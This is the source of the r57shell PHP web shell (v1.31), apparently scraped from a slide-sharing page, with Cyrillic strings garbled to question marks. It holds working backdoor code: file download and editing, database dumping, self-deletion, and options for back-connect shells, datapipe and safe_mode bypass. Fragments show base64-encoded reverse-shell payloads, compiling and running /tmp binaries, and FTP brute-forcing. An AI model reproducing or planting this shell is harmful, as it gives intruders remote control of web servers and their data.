<?php  /************************************************************************************************  ******/  /*  /* ...
// ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!)  // ????? ? ?????? ????????? ? ??????? ????????? m...
color: #000000;  }  td {  BORDER-RIGHT: #aaaaaa 1px solid;  BORDER-TOP: #eeeeee 1px solid;  BORDER-LEFT: #eeeeee 1px solid...
BORDER-TOP: #999999 1px solid;  BORDER-LEFT: #999999 1px solid;  BORDER-BOTTOM: #ffffff 1px solid;  BACKGROUND-COLOR: #e4e...
}     function addFile($data, $name, $time = 0)     {       $name = str_replace(, /, $name);       $dtime = dechex($this->...
$ctrldir .           $this -> eof_ctrl_dir .           pack(v, sizeof($this -> ctrl_dir)) .           pack(v, sizeof($this...
var $user = ;   var $pass = ;   var $base = ;   var $db = ;   var $connection;   var $res;   var $error;   var $rows;   va...
if(@mssql_select_db($this->base,$this->connection)) return 1;      break;      case PostgreSQL:       return 1;      break...
return 1;         }        $error = @ocierror();        $this->error=$error[message];        }      break;      }    retur...
$this->dump[4] = ## Table: .$table;     $this->dump[5] = ## --------------------------------------- ;     switch($this->db...
{       case MySQL:        @mysql_close($this->connection);     break;     case MSSQL:      @mssql_close($this->connection...
}  if(isset($_GET[phpinfo])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a  href=".$_S...
echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows :  <b>".$ar."</b></font></td></tr></table><br>"; ...
@ob_end_clean();   }   return U_wordwrap((string) $value);   }  function U_wordwrap($str)   {   $str = @wordwrap(@htmlspec...
die();   }  if(isset($_GET[mem]))   {     echo $head;     echo <table width=100%><tr><td bgcolor=#cccccc><div align=center...
ru_text21=>????? ???,  ru_text22=>datapipe,  ru_text23=>????????? ????,  ru_text24=>????????? ????,  ru_text25=>????????? ...
ru_text67=>Chown/Chgrp/Chmod,  ru_text68=>???????,  ru_text69=>????????1,  ru_text70=>????????2,  ru_text71=>"?????? ?????...
copy(),  ru_text116=>?????????? ????,  ru_text117=>?,  ru_text118=>???? ??????????,  ru_text119=>?? ??????? ??????????? ??...
eng_text34=>Test bypass safe_mode with include function,  eng_text35=>Test bypass safe_mode with load file in mysql,  eng_...
eng_text85=>Test bypass safe_mode with commands execute via MSSQL server,  eng_text86=>Download files from server,  eng_bu...
find sgid files=>find / -type f -perm -02000 -ls,  find sgid files in current dir=>find . -type f -perm -02000 -ls,  find ...
$dir = @getcwd();  $unix = 0;  if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;  if(empty($dir))   {   $os = gete...
}  if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }  $SERVER_SOFTWARE = getenv(SERVER_SOFTWARE); ...
}    return $users;  }  function err($n,$txt=)  {  echo <table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#ccc...
function cf($fname,$text)  {   $w_file=@fopen($fname,"w") or err(0);   if($w_file)   {   @fputs($w_file,@base64_decode($te...
{        var $text;        var $FilesToSearch;        var $ResultFiles;        var $FilesTotal;        var $MatchesCount; ...
$this->ResultFiles[$filename][$a+1] = $CurString;                  $this->MatchesCount += $count;                  $this->...
lIENPTk47DQpleGl0IDA7DQp9DQp9";  $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2...
gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHR  vbnMoKHVuc2lnbmVkIHNob3J0KS  hhd...
mRlZjsNCiR8ID0gMTsNCmlmICgkZGFl  bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IF  B...
3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSI  md2g9IitzY3JlZW4ud2lkdGgr  J3g...
@readfile ("http://rst.void.ru/r57shell_version/version.php?version=".$current_version."");}}  echo <body><table width=100...
echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";  echo </font></td></...
{        $filename = @basename($_POST[loc_file]);        $filedump = @fread($file,@filesize($_POST[loc_file]));        fcl...
}         else if($_POST[action] == "delete")         {         if(unlink($_POST[mk_name])) echo "<table width=100% cellpa...
{   $mtime = @filemtime($_POST[e_name]);   if(!$file=@fopen($_POST[e_name],"w")) { err(0,$_POST[e_name]); }   else {   if(...
$blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");   @unlink("/tmp/dpc.c");   $blah = ex("/tmp/dpc ".$_POST[local_port]." ".$_POST[...
}     }    }   @ftp_close($connection);   $_POST[cmd] = "";   }  if(!empty($_POST[cmd]) && $_POST[cmd]=="ftp_brute")   {  ...

R57php 1231677414471772-2

R57php 1231677414471772-2

  1. 1. <?php /************************************************************************************************ ******/ /* /* # # # # /* # # # # /* # # # # /* # ## #### ## # /* ## ## ###### ## ## /* ## ## ###### ## ## /* ## ## #### ## ## /* ### ############ ### /* ######################## /* ############## /* ######## ########## ####### /* ### ## ########## ## ### /* ### ## ########## ## ### /* ### # ########## # ### /* ### ## ######## ## ### /* ## # ###### # ## /* ## # #### # ## /* ## ## /* /* /* /* r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ??????? /* ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru /* ??????: 1.31 /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~*/ /* ????????? ????????????? ?? ?????? ? ????: blf, phoenix, virus, NorD ? ???? ?????? ?? RST/GHC. /* ???? ? ??? ???? ?????-???? ???? ?? ?????? ???? ????? ??????? ??????? ???????? ? ?????? ?? ?????? /* ?? rst@void.ru. ??? ??????????? ????? ???????????. /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~*/ /* (c)oded by 1dt.w0lf /* RST/GHC http://rst.void.ru , http://ghc.ru /* ANY MODIFIED REPUBLISHING IS RESTRICTED /************************************************************************************************ ******/ /* ~~~ ????????? | Options ~~~ */ // ????? ????? | Language // $language=ru - ??????? (russian) // $language=eng - english (??????????) $language=eng; // ?????????????? | Authentification // $auth = 1; - ?????????????? ???????? ( authentification = On ) // $auth = 0; - ?????????????? ????????? ( authentification = Off ) $auth = 0; // ????? ? ?????? ??? ??????? ? ??????? (Login & Password for access)file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  2. 2. // ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!) // ????? ? ?????? ????????? ? ??????? ????????? md5, ???????? ?? ????????? r57 // Login & password crypted with md5, default is r57 $name=ec371748dc2da624b35a4f8f685dd122; // ????? ???????????? (user login) $pass=ec371748dc2da624b35a4f8f685dd122; // ?????? ???????????? (user password) /************************************************************************************************ ******/ error_reporting(0); set_magic_quotes_runtime(0); @set_time_limit(0); @ini_set(max_execution_time,0); @ini_set(output_buffering,0); $safe_mode = @ini_get(safe_mode); $version = 1.31; if(version_compare(phpversion(), 4.1.0) == -1) { $_POST = &$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; $_COOKIE = &$HTTP_COOKIE_VARS; } if (@get_magic_quotes_gpc()) { foreach ($_POST as $k=>$v) { $_POST[$k] = stripslashes($v); } foreach ($_COOKIE as $k=>$v) { $_COOKIE[$k] = stripslashes($v); } } if($auth == 1) { if (!isset($_SERVER[PHP_AUTH_USER]) || md5($_SERVER[PHP_AUTH_USER])!==$name || md5($_SERVER[PHP_AUTH_PW])!==$pass) { header(WWW-Authenticate: Basic realm="r57shell"); header(HTTP/1.0 401 Unauthorized); exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>"); } } $head = <!-- ??????????, ???? --> <html> <head> <title>r57shell</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> <STYLE> tr { BORDER-RIGHT: #aaaaaa 1px solid; BORDER-TOP: #eeeeee 1px solid; BORDER-LEFT: #eeeeee 1px solid; BORDER-BOTTOM: #aaaaaa 1px solid;file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  3. 3. color: #000000; } td { BORDER-RIGHT: #aaaaaa 1px solid; BORDER-TOP: #eeeeee 1px solid; BORDER-LEFT: #eeeeee 1px solid; BORDER-BOTTOM: #aaaaaa 1px solid; color: #000000; } .table1 { BORDER: 0px; BACKGROUND-COLOR: #D4D0C8; color: #000000; } .td1 { BORDER: 0px; font: 7pt Verdana; color: #000000; } .tr1 { BORDER: 0px; color: #000000; } table { BORDER: #eeeeee 1px outset; BACKGROUND-COLOR: #D4D0C8; color: #000000; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; color: #000000; } select { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; color: #000000;; } submit { BORDER: buttonhighlight 2px outset; BACKGROUND-COLOR: #e4e0d8; width: 30%; color: #000000; } textarea { BORDER-RIGHT: #ffffff 1px solid;file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  4. 4. BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; color: #000000; } BODY { margin: 1px; color: #000000; background-color: #e4e0d8; } A:link {COLOR:red; TEXT-DECORATION: none} A:visited { COLOR:red; TEXT-DECORATION: none} A:active {COLOR:red; TEXT-DECORATION: none} A:hover {color:blue;TEXT-DECORATION: none} </STYLE> <script language=javascript> function hide_div(id) { document.getElementById(id).style.display = none; document.cookie=id+=0;; } function show_div(id) { document.getElementById(id).style.display = block; document.cookie=id+=1;; } function change_divst(id) { if (document.getElementById(id).style.display == none) show_div(id); else hide_div(id); } </script>; class zipfile { var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "x50x4bx05x06x00x00x00x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray[year] < 1980) { $timearray[year] = 1980; $timearray[mon] = 1; $timearray[mday] = 1; $timearray[hours] = 0; $timearray[minutes] = 0; $timearray[seconds] = 0; } return (($timearray[year] - 1980) << 25) | ($timearray[mon] << 21) | ($timearray[mday] << 16) | ($timearray[hours] << 11) | ($timearray[minutes] << 5) | ($timearray[seconds] >> 1);file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  5. 5. } function addFile($data, $name, $time = 0) { $name = str_replace(, /, $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = x . $dtime[6] . $dtime[7] . x . $dtime[4] . $dtime[5] . x . $dtime[2] . $dtime[3] . x . $dtime[0] . $dtime[1]; eval($hexdtime = " . $hexdtime . ";); $fr = "x50x4bx03x04"; $fr .= "x14x00"; $fr .= "x00x00"; $fr .= "x08x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack(V, $crc); $fr .= pack(V, $c_len); $fr .= pack(V, $unc_len); $fr .= pack(v, strlen($name)); $fr .= pack(v, 0); $fr .= $name; $fr .= $zdata; $this -> datasec[] = $fr; $cdrec = "x50x4bx01x02"; $cdrec .= "x00x00"; $cdrec .= "x14x00"; $cdrec .= "x00x00"; $cdrec .= "x08x00"; $cdrec .= $hexdtime; $cdrec .= pack(V, $crc); $cdrec .= pack(V, $c_len); $cdrec .= pack(V, $unc_len); $cdrec .= pack(v, strlen($name) ); $cdrec .= pack(v, 0 ); $cdrec .= pack(v, 0 ); $cdrec .= pack(v, 0 ); $cdrec .= pack(v, 0 ); $cdrec .= pack(V, 32 ); $cdrec .= pack(V, $this -> old_offset ); $this -> old_offset += strlen($fr); $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode(, $this -> datasec); $ctrldir = implode(, $this -> ctrl_dir); return $data .file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  6. 6. $ctrldir . $this -> eof_ctrl_dir . pack(v, sizeof($this -> ctrl_dir)) . pack(v, sizeof($this -> ctrl_dir)) . pack(V, strlen($ctrldir)) . pack(V, strlen($data)) . "x00x00"; } } function compress(&$filename,&$filedump,$compress) { global $content_encoding; global $mime_type; if ($compress == bzip && @function_exists(bzcompress)) { $filename .= .bz2; $mime_type = application/x-bzip2; $filedump = bzcompress($filedump); } else if ($compress == gzip && @function_exists(gzencode)) { $filename .= .gz; $content_encoding = x-gzip; $mime_type = application/x-gzip; $filedump = gzencode($filedump); } else if ($compress == zip && @function_exists(gzcompress)) { $filename .= .zip; $mime_type = application/zip; $zipfile = new zipfile(); $zipfile -> addFile($filedump, substr($filename, 0, -4)); $filedump = $zipfile -> file(); } else { $mime_type = application/octet-stream; } } function mailattach($to,$from,$subj,$attach) { $headers = "From: $fromrn"; $headers .= "MIME-Version: 1.0rn"; $headers .= "Content-Type: ".$attach[type]; $headers .= "; name="".$attach[name].""rn"; $headers .= "Content-Transfer-Encoding: base64rnrn"; $headers .= chunk_split(base64_encode($attach[content]))."rn"; if(@mail($to,$subj,"",$headers)) { return 1; } return 0; } class my_sql { var $host = localhost; var $port = ;file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  7. 7. var $user = ; var $pass = ; var $base = ; var $db = ; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect() { switch($this->db) { case MySQL: if(empty($this->port)) { $this->port = 3306; } if(!function_exists(mysql_connect)) return 0; $this->connection = @mysql_connect($this->host.:.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; break; case MSSQL: if(empty($this->port)) { $this->port = 1433; } if(!function_exists(mssql_connect)) return 0; $this->connection = @mssql_connect($this->host.,.$this->port,$this->user,$this->pass); if($this->connection) return 1; break; case PostgreSQL: if(empty($this->port)) { $this->port = 5432; } $str = "host=".$this->host." port=".$this->port." user=".$this->user." password=".$this->pass." dbname=".$this->base.""; if(!function_exists(pg_connect)) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; break; case Oracle: if(!function_exists(ocilogon)) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; break; } return 0; } function select_db() { switch($this->db) { case MySQL: if(@mysql_select_db($this->base,$this->connection)) return 1; break; case MSSQL:file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  8. 8. if(@mssql_select_db($this->base,$this->connection)) return 1; break; case PostgreSQL: return 1; break; case Oracle: return 1; break; } return 0; } function query($query) { $this->res=$this->error=; switch($this->db) { case MySQL: if(false===($this->res=@mysql_query(/*.chr(0).*/.$query,$this->connection))) { $this->error = @mysql_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case MSSQL: if(false===($this->res=@mssql_query($query,$this->connection))) { $this->error = Query error; return 0; } else if(@mssql_num_rows($this->res) > 0) { return 1; } return 2; break; case PostgreSQL: if(false===($this->res=@pg_query($this->connection,$query))) { $this->error = @pg_last_error($this->connection); return 0; } else if(@pg_num_rows($this->res) > 0) { return 1; } return 2; break; case Oracle: if(false===($this->res=@ociparse($this->connection,$query))) { $this->error = Query parse error; } else { if(@ociexecute($this->res)) { if(@ocirowcount($this->res) != 0) return 2;file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  9. 9. return 1; } $error = @ocierror(); $this->error=$error[message]; } break; } return 0; } function get_result() { $this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db) { case MySQL: $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case MSSQL: $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; break; case PostgreSQL: $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case Oracle: $this->num_fields=@ocinumcols($this->res); while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreestatement($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; } return 0; } function dump($table) { if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = ##; $this->dump[1] = ## --------------------------------------- ; $this->dump[2] = ## Created: .date ("d/m/Y H:i:s"); $this->dump[3] = ## Database: .$this->base;file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  10. 10. $this->dump[4] = ## Table: .$table; $this->dump[5] = ## --------------------------------------- ; switch($this->db) { case MySQL: $this->dump[0] = ## MySQL dump; if($this->query(/*.chr(0).*/ SHOW CREATE TABLE `.$table.`)!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0][Create Table]; $this->dump[] = ## --------------------------------------- ; if($this->query(/*.chr(0).*/ SELECT * FROM `.$table.`)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} $this->dump[] = INSERT INTO `.$table.` (`.@implode("`, `", $this->columns).`) VALUES (.@implode(", ", $this->rows[$i]).);; } break; case MSSQL: $this->dump[0] = ## MSSQL dump; if($this->query(SELECT * FROM .$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = INSERT INTO .$table. (.@implode(", ", $this->columns).) VALUES (.@implode(", ", $this->rows[$i]).);; } break; case PostgreSQL: $this->dump[0] = ## PostgreSQL dump; if($this->query(SELECT * FROM .$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = INSERT INTO .$table. (.@implode(", ", $this->columns).) VALUES (.@implode(", ", $this->rows[$i]).);; } break; case Oracle: $this->dump[0] = ## ORACLE dump; $this->dump[] = ## under construction; break; default: return 0; break; } return 1; } function close() { switch($this->db)file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  11. 11. { case MySQL: @mysql_close($this->connection); break; case MSSQL: @mssql_close($this->connection); break; case PostgreSQL: @pg_close($this->connection); break; case Oracle: @oci_close($this->connection); break; } } function affected_rows() { switch($this->db) { case MySQL: return @mysql_affected_rows($this->res); break; case MSSQL: return @mssql_affected_rows($this->res); break; case PostgreSQL: return @pg_affected_rows($this->res); break; case Oracle: return @ocirowcount($this->res); break; default: return 0; break; } } } if(!empty($_POST[cmd]) && $_POST[cmd]=="download_file" && !empty($_POST[d_name])) { if(!$file=@fopen($_POST[d_name],"r")) { err(1,$_POST[d_name]); $_POST[cmd]=""; } else { @ob_clean(); $filename = @basename($_POST[d_name]); $filedump = @fread($file,@filesize($_POST[d_name])); fclose($file); $content_encoding=$mime_type=; compress($filename,$filedump,$_POST[compress]); if (!empty($content_encoding)) { header(Content-Encoding: . $content_encoding); } header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename="".$filename."";"); echo $filedump; exit(); }file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  12. 12. } if(isset($_GET[phpinfo])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER[PHP_SELF].">BACK</a> ]</b></font></div>"; die(); } if (!empty($_POST[cmd]) && $_POST[cmd]=="db_query") { echo $head; $sql = new my_sql(); $sql->db = $_POST[db]; $sql->host = $_POST[db_server]; $sql->port = $_POST[db_port]; $sql->user = $_POST[mysql_l]; $sql->pass = $_POST[mysql_p]; $sql->base = $_POST[mysql_db]; $querys = @explode(;,$_POST[db_query]); echo <body bgcolor=#e4e0d8>; if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Cant connect to SQL server</b></font></div>"; else { if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Cant select database</b></font></div>"; else { foreach($querys as $num=>$query) { if(strlen($query)>5) { echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; switch($sql->query($query)) { case 0: echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql- >error."</b></font></td></tr></table>"; break; case 1: if($sql->get_result()) { echo "<table width=100%>"; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", $sql->columns); echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; for($i=0;$i<$sql->num_rows;$i++) { foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); echo <tr><td><font face=Verdana size=-2>&nbsp;.$values.&nbsp;</font></td></tr>; } echo "</table>"; } break; case 2: $ar = 
$sql->affected_rows()?($sql->affected_rows()):(0);file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  13. 13. echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; break; } } } } } echo "<br><form name=form method=POST>"; echo in(hidden,db,0,$_POST[db]); echo in(hidden,db_server,0,$_POST[db_server]); echo in(hidden,db_port,0,$_POST[db_port]); echo in(hidden,mysql_l,0,$_POST[mysql_l]); echo in(hidden,mysql_p,0,$_POST[mysql_p]); echo in(hidden,mysql_db,0,$_POST[mysql_db]); echo in(hidden,cmd,0,db_query); echo "<div align=center>"; echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value="".$sql- >base.""></font><br>"; echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST[db_query])?($_POST[db_query]):("SHOW DATABASES;nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=" Run SQL query "></div><br><br>"; echo "</form>"; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER[PHP_SELF].">BACK</a> ]</b></font></div>"; die(); } if(isset($_GET[delete])) { @unlink(__FILE__); } if(isset($_GET[tmp])) { @unlink("/tmp/bdpl"); @unlink("/tmp/back"); @unlink("/tmp/bd"); @unlink("/tmp/bd.c"); @unlink("/tmp/dp"); @unlink("/tmp/dpc"); @unlink("/tmp/dpc.c"); } if(isset($_GET[phpini])) { echo $head; function U_value($value) { if ($value == ) return <i>no value</i>; if (@is_bool($value)) return $value ? TRUE : FALSE; if ($value === null) return NULL; if (@is_object($value)) $value = (array) $value; if (@is_array($value)) { @ob_start(); print_r($value); $value = @ob_get_contents();file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  14. 14. @ob_end_clean(); } return U_wordwrap((string) $value); } function U_wordwrap($str) { $str = @wordwrap(@htmlspecialchars($str), 100, <wbr />, true); return @preg_replace(!(&[^;]*)<wbr />([^;]*;)!, $1$2<wbr />, $str); } if (@function_exists(ini_get_all)) { $r = ; echo <table width=100%>, <tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>; foreach (@ini_get_all() as $key=>$value) { $r .= <tr><td>.ws(3).<font face=Verdana size=-2><b>.$key.</b></font></td><td><font face=Verdana size=- 2><div align=center><b>.U_value($value[local_value]).</b></div></font></td><td><font face=Verdana size=- 2><div align=center><b>.U_value($value[global_value]).</b></div></font></td></tr>; } echo $r; echo </table>; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER[PHP_SELF].">BACK</a> ]</b></font></div>"; die(); } if(isset($_GET[cpu])) { echo $head; echo <table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>; $cpuf = @file("cpuinfo"); if($cpuf) { $c = @sizeof($cpuf); for($i=0;$i<$c;$i++) { $info = @explode(":",$cpuf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= <tr><td>.ws(3).<font face=Verdana size=-2><b>.trim($info[0]).</b></font></td><td><font face=Verdana size=-2><div align=center><b>.trim($info[1]).</b></div></font></td></tr>; } echo $r; } else { echo <tr><td>.ws(3).<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>; } echo </table>; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER[PHP_SELF].">BACK</a> 
]</b></font></div>";file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  15. 15. die(); } if(isset($_GET[mem])) { echo $head; echo <table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>; $memf = @file("meminfo"); if($memf) { $c = sizeof($memf); for($i=0;$i<$c;$i++) { $info = explode(":",$memf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= <tr><td>.ws(3).<font face=Verdana size=-2><b>.trim($info[0]).</b></font></td><td><font face=Verdana size=-2><div align=center><b>.trim($info[1]).</b></div></font></td></tr>; } echo $r; } else { echo <tr><td>.ws(3).<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>; } echo </table>; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER[PHP_SELF].">BACK</a> ]</b></font></div>"; die(); } $lang=array( ru_text1 =>??????????? ???????, ru_text2 =>?????????? ?????? ?? ???????, ru_text3 =>????????? ???????, ru_text4 =>??????? ??????????, ru_text5 =>???????? ?????? ?? ??????, ru_text6 =>????????? ????, ru_text7 =>??????, ru_text8 =>???????? ?????, ru_butt1 =>?????????, ru_butt2 =>?????????, ru_text9 =>???????? ????? ? ???????? ??? ? /bin/bash, ru_text10=>??????? ????, ru_text11=>?????? ??? ???????, ru_butt3 =>???????, ru_text12=>back-connect, ru_text13=>IP-?????, ru_text14=>????, ru_butt4 =>?????????, ru_text15=>???????? ?????? ? ?????????? ???????, ru_text16=>????????????, ru_text17=>????????? ????, ru_text18=>????????? ????, ru_text19=>Exploits, ru_text20=>????????????,file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  16. 16. ru_text21=>????? ???, ru_text22=>datapipe, ru_text23=>????????? ????, ru_text24=>????????? ????, ru_text25=>????????? ????, ru_text26=>????????????, ru_butt5 =>?????????, ru_text28=>?????? ? safe_mode, ru_text29=>?????? ????????, ru_butt6 =>???????, ru_text30=>???????? ?????, ru_butt7 =>???????, ru_text31=>???? ?? ??????, ru_text32=>?????????? PHP ????, ru_text33=>???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL, ru_butt8 =>?????????, ru_text34=>???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include, ru_text35=>???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql, ru_text36=>???? . ???????, ru_text37=>?????, ru_text38=>??????, ru_text39=>????, ru_text40=>???? ??????? ???? ??????, ru_butt9 =>????, ru_text41=>????????? ? ?????, ru_text42=>?????????????? ?????, ru_text43=>????????????? ????, ru_butt10=>?????????, ru_butt11=>?????????????, ru_text44=>?????????????? ????? ??????????! ?????? ?????? ??? ??????!, ru_text45=>???? ????????, ru_text46=>???????? phpinfo(), 